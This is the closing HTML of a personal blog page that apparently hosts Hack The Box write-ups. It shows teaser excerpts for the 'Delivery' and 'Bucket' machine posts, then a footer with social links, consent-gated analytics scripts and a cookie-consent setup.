        <span class="page__meta-lang"><a href="/writeup/2021/05/htb-ready/">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
        

        

        

        
        
        
        
      <!-- End Read in other languages-->
      <span class="page__meta-sep page__meta-share"></span>
      <span class="page__meta-share">
        <i class="fas fa-share-alt" aria-hidden="true"></i>
        <a href="#sharelinks">Share</a>
      </span>
  </p>


    <p class="archive__item-excerpt" itemprop="description">Hello guys!

This week’s machine will be Delivery, another easy-rated machine from Hack The Box, created by ippsec.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/m7oESPT.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
      
      
      <a href="https://davicruz.com/en-US/writeup/2021/04/htb-bucket/" rel="permalink">Hackthebox write-up: Bucket
</a>
      
      
      
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        <time datetime="2021-04-24T09:00:00-03:00">April 24, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          12 minute read
        
      </span>
    


      <!-- Start Read in other languages-->
        <span class="page__meta-sep page__meta-lang"></span>
        
        
        
        <span class="page__meta-lang"><a href="/writeup/2021/05/htb-ready/">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
        

        

        

        
        
        
        
      <!-- End Read in other languages-->
      <span class="page__meta-sep page__meta-share"></span>
      <span class="page__meta-share">
        <i class="fas fa-share-alt" aria-hidden="true"></i>
        <a href="#sharelinks">Share</a>
      </span>
  </p>


    <p class="archive__item-excerpt" itemprop="description">Hello guys!

This week’s machine will be Bucket, another median-rated machine from Hack The Box, created by MrR3boot.
</p>
  </article>
</div>

        
      </div>
    </div>
  
  
</div>

    </div>

    
      <div class="search-content">
        <div class="search-content__inner-wrap">
<form class="search-content__form" onkeydown="return event.key != 'Enter';">
    <label class="sr-only" for="search">
      Enter your search term...
    </label>
    <input type="search" id="search" class="search-input" tabindex="-1" placeholder="Enter your search term...">
  </form>
  <div id="results" class="results"></div>
</div>

      </div>
    

    <div id="footer" class="page__footer">
      <footer>
        <!-- start custom footer snippets -->

<!-- Osano - consent -->
<script src="https://cdn.jsdelivr.net/npm/cookieconsent@3/build/cookieconsent.min.js" data-cfasync="false"></script>

<!-- end custom footer snippets -->
        <div class="page__footer-follow">
  <ul class="social-icons">

    
    <li><strong>Follow:</strong></li>
    

    
    
    
    <li><a href="https://www.linkedin.com/in/davicruz" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i> Linkedin</a></li>
    
    
    
    <li><a href="https://twitter.com/zerahzurc" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-twitter-square" aria-hidden="true"></i> Twitter</a></li>
    
    
    
    <li><a href="https://github.com/davi-cruz" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-github" aria-hidden="true"></i> GitHub</a></li>
    
    
    
    <!-- Terms and Privacy -->
    <li><a href="https://davicruz.com/en-US/terms-and-privacy/" rel="nofollow noopener noreferrer">
        <i class="fas fa-user-shield" aria-hidden="true"></i> Terms of Service and Privacy Policy</a></li>
    <!-- end Terms and Privacy -->
    <li><a href="/feed.xml"><i class="fas fa-fw fa-rss-square" aria-hidden="true"></i> Feed</a></li>
  </ul>
</div>

<!-- Start Read in other languages-->
<div class="page__footer-follow">
  <ul>
    
    
    
    <li><a href="https://davicruz.com">Disponível também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></li>
    

    

    

      
      
    
      
  </ul>
</div>
<!-- End Read in other languages-->

<div class="page__footer-copyright">© 2021 Davi Cruz. Powered by <a href="https://jekyllrb.com" rel="nofollow">Jekyll</a> &amp; <a href="https://mademistakes.com/work/minimal-mistakes-jekyll-theme/" rel="nofollow">Minimal Mistakes</a>.</div>

      </footer>
    </div>

    
  <script src="/assets/js/main.min.js"></script>




<script src="/assets/js/lunr/lunr.min.js"></script>
<script src="/assets/js/lunr/lunr-store.js"></script>
<script src="/assets/js/lunr/lunr-en.js"></script>




  <!-- start custom analytics snippet -->

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-54883666-1"></script>
<script>
  function EnableGTAGonConsent(){
    window.dataLayer = window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());
    gtag('config', 'UA-54883666-1', { 'anonymize_ip': true});
  }
</script>

<!-- Microsoft Clarity -->
<script type="text/javascript">
  function EnableMSClarityonConsent(){
    (function(c,l,a,r,i,t,y){
      c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
      t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i;
      y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
  })(window, document, "clarity", "script", "5dnbfjo108");
  }
</script>

<!-- end custom analytics snippet -->





    <script>
  'use strict';

  (function() {
    var commentContainer = document.querySelector('#utterances-comments');

    if (!commentContainer) {
      return;
    }

    var script = document.createElement('script');
    script.setAttribute('src', 'https://utteranc.es/client.js');
    script.setAttribute('repo', 'davi-cruz/davi-cruz.github.io');
    script.setAttribute('issue-term', 'htb-ready');
    script.setAttribute('theme', 'github-dark');
    script.setAttribute('crossorigin', 'anonymous');

    commentContainer.appendChild(script);
  })();
</script>

  




    
<!-- Cookie Consent Management -->
<script>
    var strMessage = "This website uses cookies to ensure you get the best experience";
    var strDismiss = "Got it!";
    var strAllow = "Allow cookies";
    var strDeny = "No, thanks!";
    var strLink = "Learn More";
    var strHref = "https://davicruz.com/en-US/terms-and-privacy/";

    window.cookieconsent.initialise({
        "palette": {
            "popup": {
                "background": "#252e39"
            },
            "button": {
                "background": "transparent",
                "text": "#008288",
                "border": "#008288"
            }
        },
        "position": "bottom-left",
        "type": "opt-in",
        "content": {
            "message": strMessage,
            "dismiss": strDismiss,
            "allow": strAllow,
            "deny": strDeny,
            "link": strLink,
            "href": strHref
        },
        onInitialise: function (status) {
            var type = this.options.type;
            var didConsent = this.hasConsented();
            if (type == 'opt-in' && didConsent) {
                // enable cookies
                EnableMSClarityonConsent();
                EnableGTAGonConsent();
            }
            if (type == 'opt-out' && !didConsent) {
                // disable cookies
            }
        },
        onStatusChange: function (status, chosenBefore) {
            var type = this.options.type;
            var didConsent = this.hasConsented();
            if (type == 'opt-in' && didConsent) {
                // enable cookies
                EnableMSClarityonConsent();
                EnableGTAGonConsent();
            }
            if (type == 'opt-out' && !didConsent) {
                // disable cookies
            }
        },
        onRevokeChoice: function () {
            var type = this.options.type;
            if (type == 'opt-in') {
                // disable cookies
            }
            if (type == 'opt-out') {
                // enable cookies
                EnableMSClarityonConsent();
                EnableGTAGonConsent();
            }
        }
    });
</script>
<!-- End of Cookie Consent Management -->

  </body>
</html>
